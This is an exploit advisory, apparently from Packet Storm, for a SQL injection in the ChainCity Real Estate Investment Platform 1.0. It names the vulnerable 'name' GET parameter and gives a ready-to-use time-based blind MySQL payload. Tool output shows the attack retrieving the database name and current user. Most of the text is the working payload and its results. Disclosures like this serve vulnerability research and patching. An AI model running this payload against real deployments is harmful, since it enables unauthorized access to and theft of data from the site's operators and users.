Share
## https://sploitus.com/exploit?id=PACKETSTORM:173510
# Exploit Title: ChainCity Real Estate Investment Platform 1.0 - SQL Injection  
# Exploit Author: CraCkEr  
# Date: 12/07/2023  
# Vendor: Bug Finder  
# Vendor Homepage: https://bugfinder.net/  
# Software Link: https://script.bugfinder.net/chaincity/  
# Tested on: Windows 10 Pro  
# Impact: Database Access  
  
  
  
## Description  
  
SQL injection attacks can allow unauthorized access to sensitive data, modification of  
data and crash the application or make it unavailable, leading to lost revenue and  
damage to a company's reputation.  
  
  
  
GET parameter 'name' is vulnerable to SQL Injection  
  
https://website/chaincity/property?name=[SQLI]&location=1&my_range=12786%3B30628&amenity_id%5B%5D=1&rating%5B%5D=4  
  
---  
Parameter: name (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: name=villa'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&location=1&my_range=12786;30628&amenity_id[]=1&rating[]=4  
---  
  
  
  
[+] Starting the Attack  
  
  
fetching current database  
current database: 'u654912985_chaincity'  
  
  
fetching current user  
current user: 'u654912985_chaincity@localhost'  
  
  
  
[-] Done